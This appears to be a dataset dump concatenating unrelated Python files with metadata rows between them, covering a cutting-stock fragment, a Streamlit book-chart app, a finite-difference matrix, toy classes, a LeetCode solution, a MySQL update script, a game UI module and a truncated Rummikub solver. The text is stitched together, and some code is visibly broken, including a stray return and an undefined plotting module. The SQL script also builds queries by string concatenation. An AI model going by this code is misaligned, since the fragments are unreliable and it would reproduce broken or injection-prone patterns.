CurrentPosition = CurrentPosition - 1
if CurrentPosition < 0:
NewSolutionFound = True
DynamicTable[TableLength]['currentSolution'] = None
return returnSolution
def CheckRepeatSolution(newSolution, Solutions):
for solution in Solutions:
i = 0
if len(solution) == len(newSolution):
while solution[i] == newSolution[i]:
if i + 2 > len(solution):
return False
else:
i = i + 1
return True
#print(DynamicCuttingStock([3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5], 10))
#print(DynamicCuttingStock({138:22, 152:25, 156:12, 171:14, 182:18, 188:18, 193:20, 200:10, 205:12, 210:14, 214:16, 215:18, 220:20}, 560)) | true |
cce1db3627e0587301ca6292f72f144777a42384 | Python | kani91/ds-sample | /app.py | UTF-8 | 1,485 | 3 | 3 | [] | no_license | import streamlit as st
import sqlite3
import pandas as pd
st.title('best selling books')
conn =sqlite3.connect('Nyt.db')
cursor=conn.cursor()
st.header('select dates')
st.slider('slider')
titles = pd.read_sql("""Select distinct g.title from google_data g join NYT_BS_2009to2019 nyt on g.isbn=nyt.primary_isbn13 order by g.title""", conn).to_dict('records')
books = titles # fill in here
return books
books=all_title()
st.write(books[0])
st.multiselect('pick a title',books)
#getting the scatter plot
#1. define sql
record_scatter=pd.read_sql("""Select
primary_isbn13, g.title,author,categories,
min(rank),
count(distinct date),
g.ratingsCount,averageRating
FROM NYT_BS_2009to2019 nyt
join g_data g
on g.isbn=nyt.primary_isbn13
group by primary_isbn13, g.title,author,categories""", conn).to_dict('records')
#2. get lists
ranks=[record['min(rank)'] for record in record_scatter]
length=[record['count(distinct date)'] for record in record_scatter]
title=[record['title'] for record in record_scatter]
author=[record['author'] for record in record_scatter]
categories=[record['categories'] for record in record_scatter]
#3. create plot
fig = px.scatter(x=ranks, y=length,hover_data=[title,author,categories])
fig.show() | true |
f86bb4718c77647b769e2d3018a39979f6d8577e | Python | Wang-ZhengYi/CMB-lensing | /dif_matrix.py | UTF-8 | 1,051 | 2.734375 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Apr 2019
@author: ZYW @ BNU
'''
#creat a matrix of derivation of 5 points
import numpy as np
import matplotlib.pyplot as plt
lens_sides = 256
#field degree (have to be a squared field)
field_deg = 20.0
#lensing amplitude magnification factor
#factor of scals
ipn = 5
#number of interplate points
h_0 = field_deg/lens_sides
#step-size of derivative
def g(k):
if k in range(lens_sides):
return k
elif k in range(lens_sides,lens_sides+ipn):
return k-lens_sides
elif k in range(-1*ipn,0):
return k+lens_sides
#establish a periodic fuction of map cyclic boundary
di_e = np.zeros(shape=(1,ipn),dtype='float')
di = np.zeros(shape=(lens_sides,lens_sides),dtype='float')
di_e = [-1.,-8.,0.,8.,1.]
#generating vector of derivation matrix
for i in range(lens_sides):
for j in range(ipn):
di[i,g(i-2+j)] = di_e[j]
dif=di/12.0/h_0
#Assign value to derivation matrix
np.savetxt('diff_matirx.dat', dif)
#saving derivation matrix
exit() | true |
cb742b0364583484fd8d48279ee48fc74a328f9d | Python | kbutler52/ahmed_kayyali | /nest_loop.py | UTF-8 | 75 | 3.046875 | 3 | [] | no_license | a=0
while True:
if a ==5:
break
print('Hello')
a = a+1
| true |
f93a7bb2d6c279114a5a92b870e14a992ba18229 | Python | jiangyihong/PythonTutorials | /chapter9/animal.py | UTF-8 | 463 | 3.484375 | 3 | [] | no_license | class Animal(object):
def __init__(self):
pass
def bark(self):
print("Animal is barking!")
class Dog(Animal):
def __init__(self):
super().__init__()
def bark(self):
print("Dog is barking!")
class Cat(Animal):
def __init__(self):
super().__init__()
def bark(self):
print("Cat is barking!")
animal = Animal()
animal.bark()
my_dog = Dog()
my_dog.bark()
my_cat = Cat()
my_cat.bark()
| true |
782f17790af452f1f2e6cf49fb85df1cc6353df0 | Python | jiadaizhao/LeetCode | /1301-1400/1392-Longest Happy Prefix/1392-Longest Happy Prefix.py | UTF-8 | 373 | 2.96875 | 3 | [
"MIT"
] | permissive | class Solution:
def longestPrefix(self, s: str) -> str:
lps = [0] * len(s)
l = 0
i = 1
while i < len(s):
if s[i] == s[l]:
lps[i] = l + 1
i += 1
l += 1
elif l != 0:
l = lps[l - 1]
else:
i += 1
return s[0: lps[-1]]
| true |
8c77a2831e7efb0837f39e81fd8d8d6f246679aa | Python | addonrizky/job_daily_summary_emiten | /summarize.py | UTF-8 | 2,247 | 2.875 | 3 | [] | no_license | import mysql.connector
from mysql.connector import Error
try:
connection = mysql.connector.connect(host='localhost',
database='saham',
user='root',
password='Jakarta123!')
sql_select_Query = "select * from list_saham"
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
print("Total number of rows in saham is: ", cursor.rowcount)
print("\nPrinting each laptop record")
for row in records:
kode_saham = row[1] + ""
netval_1day_ago = str(row[16])
netval_2day_ago = str(row[20])
netval_3day_ago = str(row[21])
netval_4day_ago = str(row[22])
netval_5day_ago = str(row[23])
foreign_netval_1dago = str(row[31])
foreign_netval_2dago = str(row[32])
foreign_netval_3dago = str(row[33])
foreign_netval_4dago = str(row[34])
foreign_netval_5dago = str(row[35])
foreign_netval_total = float(foreign_netval_1dago) + float(foreign_netval_2dago) + float(foreign_netval_3dago) + float(foreign_netval_4dago) + float(foreign_netval_5dago)
print("Id = ", row[0], )
print("Kode Saham = ", row[1])
print("Nama Saham = ", row[2])
sql = "UPDATE list_saham SET netval_1day_ago = "+netval_1day_ago+", netval_2day_ago = "+netval_2day_ago+", netval_3day_ago = "+netval_3day_ago+", netval_4day_ago = "+netval_4day_ago+", netval_5day_ago = "+netval_5day_ago+", foreign_netval_1dago = "+foreign_netval_1dago+", foreign_netval_2dago = "+foreign_netval_2dago+", foreign_netval_3dago = "+foreign_netval_3dago+", foreign_netval_4dago = "+foreign_netval_4dago+", foreign_netval_5dago = "+foreign_netval_5dago+", foreign_netval_total = '"+str(foreign_netval_total)+"' WHERE kode_saham = '"+ kode_saham +"'"
print(sql)
cursor.execute(sql)
connection.commit()
#print(mycursor.rowcount, "record(s) affected")
except Error as e:
print("Error reading data from MySQL table", e)
finally:
if (connection.is_connected()):
connection.close()
cursor.close()
print("MySQL connection is closed") | true |
8050f17ec4445b27da7c3947c2c76ff9c4b977bf | Python | simbi0nts/pipboy_software | /pypboy/modules/data/misc.py | UTF-8 | 4,697 | 2.625 | 3 | [] | no_license | import pypboy
import pygame
import config
import game
import random
from pypboy.modules.data import entities
class Module(pypboy.SubModule):
label = "Misc"
def __init__(self, *args, **kwargs):
super(Module, self).__init__(*args, **kwargs)
self.notes = Notes()
self.notes.image = pygame.image.load('images/Quests/1.bmp')
self.notes.rect[0] = 240
self.notes.rect[1] = 50
self.add(self.notes)
self.menu = pypboy.ui.Menu(240, ['{: <22}'.format("Favourite Movies"),
'{: <22}'.format("Favourite TV Series"),
'{: <22}'.format("Favourite Books"),
'{: <22}'.format("Favourite Games"),
'{: <22}'.format("Favourite Music Genres"),
'{: <22}'.format("Favourite Dish"),
'{: <22}'.format("Favourite Colour"),
'{: <22}'.format("About Me")], [self.Note1, self.Note2, self.Note3, self.Note4, self.Note5, self.Note6, self.Note7, self.Note8], 0)
self.menu.rect[0] = 18
self.menu.rect[1] = 50
self.add(self.menu)
def Note1(self):
self.construct(text_arr="o Fringe \no Shameless \no Fullmetal Alchemist \no "
"Cowboy Bebop \no Steins;Gate \no Firefly \no "
"Breaking Bad \no Doctor Who \no Arrested Development \no "
"Rick And Morty \no Daredevil \no Gotham")
def Note2(self):
self.construct(text_arr="o Back To The Future Trilogy \no Clerks \no Bad Santa \no "
"Bridge To Terabithia \no The Butterfly Effect \no The Game \no "
"Mr. Nobody \no Hot Fuzz \no Big Nothing \no "
"Shaun Of The Dead \no The Terminal \no Filth")
def Note3(self):
self.construct(text_arr="o The Martian (Andy Weir) \no The Godfather (Mario Puzo) \no The Master And Margarita (Mikhail Bulgakov) \no "
"Los Piratas Del Golfo (Vicente Riva Palacio) \no The End Of Eternity (Isaac Asimov) \no I, Robot (Isaac Asimov) \no "
"Drei Kameraden (Erich Maria Remarque)")
def Note4(self):
self.construct(text_arr="o To The Moon \no Heavy Rain \no TES 3: Morrowind \no "
"Infamous \no The Wolf Among Us \no The Walking Dead \no "
"Last Of Us \no Gunpoint \no Faster Than Light \no "
"Bad Day LA \no True Crime: Streets Of LA \no Marc Ecko's Getting Up")
def Note5(self):
self.construct(text_arr="o Folk Rock \no Electro Swing \no ... \no Actually, i like different genres :-)")
def Note6(self):
self.construct(text_arr="o Bacon")
def Note7(self):
self.construct(text_arr="o Purple")
def Note8(self):
self.construct(text_arr="o I'm lazy")
def construct(self, IMG='images/Quests/1.bmp', text_arr="Nothing", font=19, chk_shw_loc=True):
text_arr = self.text_to_array(text_arr)
self.notes.image = pygame.image.load(IMG)
self.notes.rect[0] = 210
self.notes.rect[1] = 50
if chk_shw_loc:
text = config.FONTS[18].render("Show Location", True, (21, 61, 34), (0, 0, 0))
self.notes.image.blit(text, (120, 0))
coord = 40
for x in text_arr:
text = config.FONTS[font].render(x, True, (95, 255, 177), (0, 0, 0))
self.notes.image.blit(text, (5, coord))
coord += 18
self.add(self.notes)
def text_to_array(self, text):
text_array = text.split(' ')
final_text_array = ['']
k = 0
for x in text_array:
if "\n" in x:
final_text_array.append("")
k += 1
final_text_array[k] += x[1:] + " "
elif len(x) + len(final_text_array[k]) < 29:
final_text_array[k] += x + " "
else:
final_text_array.append(x + " ")
k += 1
return final_text_array
def handle_resume(self):
self.parent.pypboy.header.headline = "DATA"
self.parent.pypboy.header.title = "Moscow City"
super(Module, self).handle_resume()
class Notes(game.Entity):
def __init__(self):
super(Notes, self).__init__()
self.rect = self.image.get_rect()
self.image = self.image.convert()
| true |
52984559f0a6bac359aa34c8c547174925317d28 | Python | mhdmsv89/Hello_World | /Assignments/mirror_in_list.py | UTF-8 | 844 | 3.328125 | 3 | [] | no_license | lst = [100, 120, 130, 140, 150, 160, 170, 180, 190, 200]
mid_lst = len(lst) // 2
lft = lst[mid_lst:]
lft_mirror = lst[:(mid_lst - 1): -1]
print(lft, lft_mirror)
my_lst = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
res_1 = my_lst[:len(my_lst) // 2] + my_lst[len(my_lst) // 2::-1]
res_2 = my_lst[:len(my_lst) // 2], my_lst[len(my_lst) // 2::-1]
res_3 = my_lst[:len(my_lst) // 2], my_lst[len(my_lst) // 2 - 1::-1]
res_4 = my_lst[:len(my_lst) // 2], my_lst[:len(my_lst) // 2][::-1]
res_5 = my_lst[len(my_lst) // 2:][::-1] + my_lst[len(my_lst) // 2:]
print(my_lst)
print(res_1)
print(res_2)
print(res_3)
print(res_4)
print(res_5)
left_lst = lambda lst_1: lst_1[:len(lst_1) // 2] + lst_1[:len(lst_1) // 2][::-1]
right_lst = lambda lst_1: lst_1[len(lst_1) // 2:][::-1] + lst_1[len(lst_1) // 2:]
imp = list(range(1,41))
print(left_lst(imp))
print(right_lst(imp)) | true |
9f8f71906d8451fc45601dc7ee5395052fd33e61 | Python | syurskyi/Python_Topics | /125_algorithms/005_searching_and_sorting/_exercises/exersises/Section 4 Arrays, Searching and Sorting/74.checkdupsorting.py | UTF-8 | 345 | 2.703125 | 3 | [] | no_license | # ___ checkdupsorting myarray
# ?.so..
# print ?
# ___ i __ ra.. 0 le. ?) - 1):
# #print "in for loop:", myarray
# # #print "comparing", myarray[i],"and",myarray[i + 1]
# __(?|? __ ?|? + 1
# print("Duplicates present:" ?|?
# r_
# print("There are No duplicates present in the given array.")
#
# myarray = [3,4,5,6,7,8,7]
# ? ?
| true |
4b3ac3639f6005da56cb62354e60480e974e72a0 | Python | Shmalii/Acces-Control | /Program/database.py | UTF-8 | 5,714 | 2.84375 | 3 | [] | no_license | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import sqlite3
import uuid
from sqlite3 import Error
import hashlib
import tkinter as tk
import tkinter.messagebox
def sql_connection(root):
try:
con = sqlite3.connect('database.db')
return con
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка при під'єднанні до бази даних")
root.destroy()
def hashing(passw, salt):
amount = 1024
pasw = salt.encode() + passw.encode()
for i in range(amount):
pasw = hashlib.sha256(pasw).hexdigest()
pasw = bytes.fromhex(pasw)
return pasw.hex(), salt
def sql_table(root, con):
try:
cursorObj = con.cursor()
cursorObj.execute(
" CREATE TABLE IF NOT EXISTS users(username VARCHAR(30) PRIMARY KEY, pass CHAR(512), salt CHAR(512), blocked TINYINT, "
"passrestrictions TINYINT, admin TINYINT)")
con.commit()
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка при cтворенні таблиці. Спробуйте пізніше!")
root.destroy()
def createRoot(root, con):
curs = con.cursor()
curs.execute('SELECT * FROM users')
res = curs.fetchall()
if res == []:
try:
curs = con.cursor()
salt = uuid.uuid4().hex
hashh = hashing(" ", salt)
curs.execute('INSERT INTO users VALUES ("Admin", ?,?,0,0,1);', hashh)
con.commit()
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка при створенні адміністратора. Спробуйте пізніше!")
root.destroy()
def checkpass(usrname, pasw, con):
curs = con.cursor()
param = list()
param.append(usrname)
curs.execute('SELECT * FROM users WHERE username=?;', param)
res = curs.fetchone()
if res is not None:
passcheck = res[1]
saltchck = res[2]
pasw = hashing(pasw, saltchck)[0]
if passcheck == pasw:
return True
else:
tkinter.messagebox.showerror("Помилка", "Помилка при вході, перевірте введені дані!")
return False
else:
tkinter.messagebox.showerror("Помилка", "Помилка при вході, перевірте введені дані!")
return False
def adduser(username, pasw, con):
curs = con.cursor()
param = list()
param.append(username)
curs.execute('SELECT * FROM users WHERE username=?;', param)
res = curs.fetchone()
if res is not None:
tkinter.messagebox.showerror("Помилка", "Користувач з таким ім'ям вже існує!")
return False
else:
param = list()
param.append(username)
salt = uuid.uuid4().hex
pasw = hashing(pasw, salt)
param.append(pasw[0])
param.append(pasw[1])
try:
curs.execute("INSERT INTO users VALUES(?,?,?,0,0,0);", param)
con.commit()
tkinter.messagebox.showinfo("Adding", "Користувача додано")
return True
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка під час додавання користувача!")
return False
def parseusers(con):
curs = con.cursor()
try:
curs.execute("SELECT username, blocked,passrestrictions, admin FROM users ")
res = curs.fetchall()
con.commit()
return res
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка під час отримання інформації про користувачів!")
return None
def changesusrinfo(name, blocked, passrestrict, con):
param = list()
param.append(blocked)
param.append(passrestrict)
param.append(name)
try:
curs = con.cursor()
curs.execute("UPDATE users SET blocked=?,passrestrictions=? WHERE username=?", param)
con.commit()
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка при змінені даних користувача!")
def parseinform(username, con):
curs = con.cursor()
param= list()
param.append(username)
curs.execute("SELECT * FROM users WHERE username=?",param)
res= curs.fetchone()
return res
def checkadmin(username, con):
curs = con.cursor()
param = list()
param.append(username)
curs.execute("SELECT * FROM users WHERE username=?", param)
return curs.fetchone()[5]
def chck(user, pasw, con):
curs = con.cursor()
param = list()
param.append(user)
curs.execute('SELECT * FROM users WHERE username=?;', param)
res = curs.fetchone()
passcheck = res[1]
saltchck = res[2]
pasw = hashing(pasw, saltchck)[0]
if passcheck == pasw:
return True
else:
return False
def changepasw(usr, pasw, con):
params = list()
salt = uuid.uuid4().hex
pasw = hashing(pasw, salt)
params.append(pasw[0])
params.append(pasw[1])
params.append(usr)
try:
curs = con.cursor()
curs.execute("UPDATE users SET pass=?, salt=? WHERE username=?", params)
tkinter.messagebox.showinfo("Зміна", "Пароль змінено")
con.commit()
except Error:
tkinter.messagebox.showerror("Помилка", "Помилка при змінені паролю")
| true |
20174df3b41f6321464bf15c3c63b8a90aff18de | Python | CamDavidsonPilon/python_packages_survey | /utils.py | UTF-8 | 774 | 2.578125 | 3 | [] | no_license | import os
import hashlib
def fetch_from_url_pypi_libraries():
print("Fetching public PYPI libraries.")
from lxml import html
import requests
response = requests.get("https://pypi.org/simple/")
tree = html.fromstring(response.content)
return set(package for package in tree.xpath('//a/text()'))
def save_pypi_libraries_to_disk():
import pickle
s = fetch_from_url_pypi_libraries()
with open('packages.pickle', 'wb') as f:
pickle.dump(s, f)
def load_from_disk_pypi_libraries():
import pickle
with open("packages.pickle", 'rb') as f:
s = pickle.load(f)
return s
def is_gcp():
return os.environ.get('GAE_APPLICATION') is not None
def md5checksum(s):
return hashlib.md5(str.encode(s)).hexdigest()
| true |
2b120c22e0df74517b2c3cc2e116240d811d73bc | Python | ronachong/holbertonschool-linux_programming | /0x00-c_dynamic_libraries/100-op-test.py | UTF-8 | 259 | 2.65625 | 3 | [] | no_license | import ctypes
cops = ctypes.CDLL('./100-operations.so')
print(cops.apples("I love"))
print(cops.bananas("I adore"))
print(cops.oranges("I hate.. I'm sorry but I hate"))
print(cops.pineapples("There's nothing better than"))
print(cops.kiwis("except kiwis"))
| true |
af9e1ff0d44ce99fc1b3ebc667fb0e276adb1f41 | Python | rbw214/zebra | /zebratess.py | UTF-8 | 15,301 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python3
#Brady Kruse
#bak225
#Braden Wells
#rbw214
'''
Various Citations:
1) 2D Noise based on Morgan McGuire @morgan3d
https://www.shadertoy.com/view/4dS3Wd
Introduced to us by Book of Shaders
https://thebookofshaders.com/11/
2) ModernGL template projects
https://github.com/moderngl/moderngl
3) Dr. TJ's Tessellation Example Code
(Thank you!)
CONTROLS:
W/S to move forward/backward
Q/E to move up/down
A/D to strafe left/right
Left and Right arrows to turn
Z/X to zoom in/out
T/Y to enable/disable automatic turning and movement
K to swap models
'''
# Here they come, it's the modules
import numpy as np
from pyrr import Matrix44, Quaternion, Vector3, vector
import moderngl
from ported._example import Example #Base class for our world
from moderngl_window.geometry.attributes import AttributeNames # pylint: disable=no-name-in-module
# Noise algorithm
# Not quite working, unused, you can skip this part
def doRandom (st):
x = (np.sin( np.dot(st, [12.9898,78.233])) * 43758.5453123)
return abs(x - np.floor(x))
def lerp(a, b, val):
out = b * val + a * (1 - val)
return out
def noise (st):
st = np.array(st)
XYScale = 20.0
ZScale = 1.0 / 20.0
st = XYScale * st
i = np.floor(st)
f = abs(np.modf(st)[0])
a = doRandom(i)
b = doRandom(i + [1.0, 0.0])
c = doRandom(i + [0.0, 1.0])
d = doRandom(i + [1.0, 1.0])
u = f * f * ( 3.0 - (2.0 * f) )
val = lerp(a, b, u[0]) + (c - a) * u[1] * (1.0 - u[0]) + (d - b) * u[0] * u[1]
return abs(val * ZScale)
# Camera class modified from simple_camera.py
class Camera():
def __init__(self, ratio):
# Camera speeds
self._zoom_step = 0.2
self._move_vertically = 0.001
self._move_horizontally = 0.001
self._rotate_horizontally = -0.02
self._rotate_vertically = 0.02
# Angle of rotation
self.angle = 0
# Distance back the camera moves
self.dist = 0.1
# Projection? In my camera? It's more likely than you think
self._field_of_view_degrees = 60.0
self._z_near = 0.01
self._z_far = 35
self._ratio = ratio
self.build_projection()
# What are you looking at? Huh?
# I'm looking at a zebra
self.camera_position = Vector3([-.1, 0.03, -.06]) #Default camera values
self.camera_front = Vector3([0.0, 1.0, 0.0])
self._camera_up = Vector3([0.0, 0.0, -1.0])
self._cameras_target = (self.camera_position + self.camera_front)
self.build_look_at()
# What if you could like zoom in, but in real life?
def zoom_in(self):
self._field_of_view_degrees = self._field_of_view_degrees - self._zoom_step
self.build_projection()
# Oh wait never mind you can just get closer
def zoom_out(self):
self._field_of_view_degrees = self._field_of_view_degrees + self._zoom_step
self.build_projection()
# Do hot sine-cosine action on the angle to get x-y vectors of movement
# Then scale it down because cos(0) == 1 and moving 1 in GL space is B A D
def move_forward(self):
self.camera_position = self.camera_position + Vector3([np.cos(self.angle),np.sin(self.angle), 0.0 ]) * self._move_horizontally
self.build_look_at()
def move_backwards(self):
self.camera_position = self.camera_position - Vector3([np.cos(self.angle),np.sin(self.angle), 0.0 ]) * self._move_horizontally
self.build_look_at()
# Same as forwards and backwards, except add in a pretty little 90 degree turn
def strafe_left(self):
self.camera_position = self.camera_position - Vector3([np.cos(self.angle + np.pi / 2),np.sin(self.angle + np.pi / 2), 0.0 ]) * self._move_horizontally
self.build_look_at()
def strafe_right(self):
self.camera_position = self.camera_position + Vector3([np.cos(self.angle + np.pi / 2),np.sin(self.angle + np.pi / 2), 0.0 ]) * self._move_horizontally
self.build_look_at()
# Thankfully, the up vector never changes, so we can just add/subtract that
def strafe_up(self):
self.camera_position = self.camera_position + self._camera_up * self._move_vertically
self.build_look_at()
def strafe_down(self):
self.camera_position = self.camera_position - self._camera_up * self._move_vertically
self.build_look_at()
'''
# Oh, that's rotate-holm
# ...We don't go there anymore.
# (is that reference forced? i dunno)
# (we just decided these were too complex to add to the new rotation system we use)
def rotate_up(self):
self.camera_front.z -= float(self._rotate_vertically)
self.build_look_at()
def rotate_down(self):
self.camera_front.z += float(self._rotate_vertically)
self.build_look_at()
'''
# The beauty of this system: just add or subtract to the angle!
def rotate_left(self):
self.angle += self._rotate_horizontally
self.build_look_at()
def rotate_right(self):
self.angle -= self._rotate_horizontally
self.build_look_at()
# Slow rotation for the auto spin/move
def slow_rotate_right(self):
self.angle -= self._rotate_horizontally / 5
self.build_look_at()
# Generate the look-at matrix with the following setup:
# Camera_position is the look-at point
# Camera_target is the eye point (just the position, except moved opposite the angle)
# the up is up, up is always up, up up up up up up up
def build_look_at(self):
#ground = noise(np.array(self.camera_position.xy)) - 0.02
ground = 0.0
if self.camera_position.z > ground:
self.camera_position.z = ground
self._camera_dist = Vector3([np.cos(self.angle), np.sin(self.angle), 0]) * self.dist
self.camera_target = self.camera_position - self._camera_dist
# Move camera up slightly to get over-shoulder view type deal
self.camera_target.z -= 0.04
self.mat_lookat = Matrix44.look_at(
self.camera_target,
self.camera_position,
self._camera_up)
# Make a lovely projection matrix out of the stuff that they're always made of
def build_projection(self):
self.mat_projection = Matrix44.perspective_projection(
self._field_of_view_degrees,
self._ratio,
self._z_near,
self._z_far)
class Zebra(Example):
title = "Zebra Land"
gl_version = (4, 1)
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Shaders for the terrain/world/floor/sludge
self.prog = self.load_program('world.glsl')
#Passing in of uniforms
self.mvp = self.prog['Mvp']
self.time = self.prog['time']
self.camera_position = self.prog['camera_position']
self.scale = self.prog['scale']
# four vertices define a quad
self.ctx.patch_vertices = 4
vertices = np.array([
[-1.0, -1.0],
[ 1.0, -1.0],
[ 1.0, 1.0],
[-1.0, 1.0],
])
vbo = self.ctx.buffer(vertices.astype('f4').tobytes())
self.vao = self.ctx.simple_vertex_array(self.prog, vbo, 'in_vert')
# Create a custom attribute name spec
# so attribute names are not forced to follow gltf standard
attr_names = AttributeNames(position='in_vert', texcoord_0='in_tex', normal='in_norm', color_0 = "color")
# Shaders for zebra/car/whatever it takes
self.zprog = self.load_program('zebra.glsl')
# Uniforms for that
self.zlight = self.zprog['Light']
self.zmvp = self.zprog['Mvp']
self.zuse = self.zprog['ZebraUse']
self.zcolor = self.zprog['color']
self.zrotate = self.zprog['Rotate']
self.ztime = self.zprog['time']
self.zebraTime = False
self.zebraPressed = False
# Get our zebra in town
self.zebra = self.load_scene('Zebra_OBJ.obj', attr_names=attr_names)
self.texture = self.load_texture_2d('Zebra_skin_colors.jpg')
self.vao2 = self.zebra.root_nodes[0].mesh.vao.instance(self.zprog)
# Car (brought to you by "Educational Purposes")
self.carDict = {
"mini_body.obj" : [0,0,0],
"mini_brakes.obj" : [0.75, 0.75, 0.75],
"mini_glass.obj" : [0.5, 0.5, 0.5],
"mini_interior.obj" : [0.33, 0.1, 0.02],
"mini_parts.obj" : [0.2, 0.2, 0.2],
"mini_rims.obj" : [0.95, 0.95, 0.93],
"mini_tires.obj" : [0.1, 0.1, 0.1],
"mini_underpart.obj" : [0,0,0],
}
# Load our car into a dictionary so that we can run through all the parts
self.car = {}
self.car["texture"] = self.load_texture_2d('mini_body_diffuse.png')
for i in self.carDict:
self.car[i] = {}
self.car[i]["model"] = self.load_scene(i, attr_names=attr_names)
self.car[i]["vao"] = self.car[i]["model"].root_nodes[0].mesh.vao.instance(self.zprog)
# Keybinds, camera setup.
self.camera = Camera(self.aspect_ratio)
# World scale (change to your heart's content)
self.camera.scale = 256
# Wow that's a few keys, I tell ya what
self.states = {
self.wnd.keys.W: False,
self.wnd.keys.S: False,
self.wnd.keys.Q: False,
self.wnd.keys.E: False,
self.wnd.keys.A: False,
self.wnd.keys.D: False,
self.wnd.keys.UP: False,
self.wnd.keys.DOWN: False,
self.wnd.keys.Z: False,
self.wnd.keys.X: False,
self.wnd.keys.LEFT: False,
self.wnd.keys.RIGHT: False,
self.wnd.keys.T: False,
self.wnd.keys.I: False,
self.wnd.keys.Y: False,
self.wnd.keys.K: False,
}
# Move_camera copied wholesale from simple_camera.py
# (except the zebra part)
def move_camera(self):
if self.states.get(self.wnd.keys.W):
self.camera.move_forward()
if self.states.get(self.wnd.keys.S):
self.camera.move_backwards()
if self.states.get(self.wnd.keys.Q):
self.camera.strafe_up()
if self.states.get(self.wnd.keys.E):
self.camera.strafe_down()
if self.states.get(self.wnd.keys.A):
self.camera.strafe_left()
if self.states.get(self.wnd.keys.D):
self.camera.strafe_right()
'''
if self.states.get(self.wnd.keys.UP):
self.camera.rotate_up()
if self.states.get(self.wnd.keys.DOWN):
self.camera.rotate_down()
'''
if self.states.get(self.wnd.keys.LEFT):
self.camera.rotate_left()
if self.states.get(self.wnd.keys.RIGHT):
self.camera.rotate_right()
if self.states.get(self.wnd.keys.Z):
self.camera.zoom_in()
if self.states.get(self.wnd.keys.X):
self.camera.zoom_out()
if self.states.get(self.wnd.keys.I):
self.camera.slow_rotate_right()
if self.states.get(self.wnd.keys.T):
self.states[self.wnd.keys.W] = True
self.states[self.wnd.keys.I] = True
if self.states.get(self.wnd.keys.Y):
self.states[self.wnd.keys.W] = False
self.states[self.wnd.keys.I] = False
# If K is pressed, toggle that zebra!
# But also only trigger it once per press
# Else ye must face the horror of the transmogrifying zebra-car
if self.states.get(self.wnd.keys.K):
if not self.zebraPressed:
self.zebraTime = not self.zebraTime
self.zebraPressed = True
else:
self.zebraPressed = False
def key_event(self, key, action, modifiers):
if key not in self.states:
print(key, action)
return
if action == self.wnd.keys.ACTION_PRESS:
self.states[key] = True
else:
self.states[key] = False
# It's time to actually see stuff!
def render(self, time, frame_time):
# Move our camera depending on keybinds
self.move_camera()
# Black background, turn on depth
self.ctx.clear(0.0, 0.0, 0.0)
self.ctx.enable(moderngl.DEPTH_TEST)
# Set our world scale for tessellation
self.scale.write(np.float32(self.camera.scale).astype('f4').tobytes()) # pylint: disable=too-many-function-args
# Put projection and look-at matrix into uniform
self.mvp.write((self.camera.mat_projection * self.camera.mat_lookat).astype('f4').tobytes())
# Setup time, camera_position into shaders
self.time.write(np.float32(time*0.2).astype('f4').tobytes()) # pylint: disable=too-many-function-args
self.camera_position.write(self.camera.camera_position.xy.astype('f4').tobytes())
# Tessellate that floor!
self.vao.render(moderngl.PATCHES)
# ZEBRA TIME
# Put in projection, camera position (which we call light for some reason?), and the time
self.zmvp.write((self.camera.mat_projection * self.camera.mat_lookat).astype('f4').tobytes())
self.zlight.write((self.camera.camera_position).astype('f4').tobytes())
self.ztime.write(np.float32(time*0.2).astype('f4').tobytes()) # pylint: disable=too-many-function-args
self.zuse.write(np.float32(self.zebraTime).astype('f4').tobytes()) # pylint: disable=too-many-function-args
if not self.zebraTime:
# Make the car look forwards properly
wheresMyCar = Matrix44.from_translation([0, 0, -0.02])
wheresMyCar = Matrix44.from_x_rotation(np.pi) * wheresMyCar
wheresMyCar = Matrix44.from_z_rotation((np.pi / 2) - self.camera.angle) * wheresMyCar
# Put that movement into the shader
self.zrotate.write((wheresMyCar).astype('f4').tobytes())
# Set our texture, then render every part of the car with the right color
self.car["texture"].use()
for i in self.carDict:
color = self.carDict[i]
self.zcolor.write(np.array(color).astype('f4').tobytes())
self.car[i]["vao"].render()
else:
# We need to get our zebra looking the right way and also slightly lower than where he starts
rotateMyZebra = Matrix44.from_translation([0, -0.05, 0])
rotateMyZebra = Matrix44.from_x_rotation(np.pi / 2) * rotateMyZebra
rotateMyZebra = Matrix44.from_z_rotation((np.pi / 2) - self.camera.angle) * rotateMyZebra
# Put that movement into the shader
self.zrotate.write((rotateMyZebra).astype('f4').tobytes())
# Show us the zebra!
self.texture.use()
self.vao2.render()
if __name__ == '__main__':
Zebra.run()
| true |
4eb5d206c670cf9b4eaee6f44d267c3ad6c5bda9 | Python | fRomke/rummi | /rummi_reverse.py | UTF-8 | 3,941 | 2.90625 | 3 | [] | no_license | from rummi_util import initTable, memoryUsage
from rummi_output import writeResult, printTableToConsole
from itertools import chain
import c_rummikub
from sys import argv
from timeit import default_timer
colors = 4
copies = 2 # ONLY WORKS FOR 2
def findSubsets(solutions, reference, to_remove, i = 0):
lenght = len(reference)
if to_remove > 0:
remove_options = range(1, to_remove+1)
elif to_remove == 0:
solutions.append(reference)
return
while(i<lenght):
for each in remove_options:
copy = reference[:]
copy[i] = copy[i] - each
if to_remove - each != 0:
findSubsets(solutions, copy[:], (to_remove - each), i+1)
else:
solutions.append(copy)
i += 1
def removeDups(solutions):
def twoDimensionize(table):
chunk = 0
stones = int(len(table)/colors)
table_2D = []
for c in range(colors):
table_2D.append(table[chunk:(chunk+stones)])
chunk += stones
return table_2D
def flipOverY(table):
newtable_2D = []
for each in twoDimensionize(table):
each.reverse()
newtable_2D.append(each)
return list(chain(*newtable_2D))
def flipOverX(table):
newtable_2D = twoDimensionize(table)
newtable_2D.reverse()
return list(chain(*newtable_2D))
def flipOverXY(table):
newtable = table[:]
newtable.reverse()
return newtable
def findAndDel(it, count):
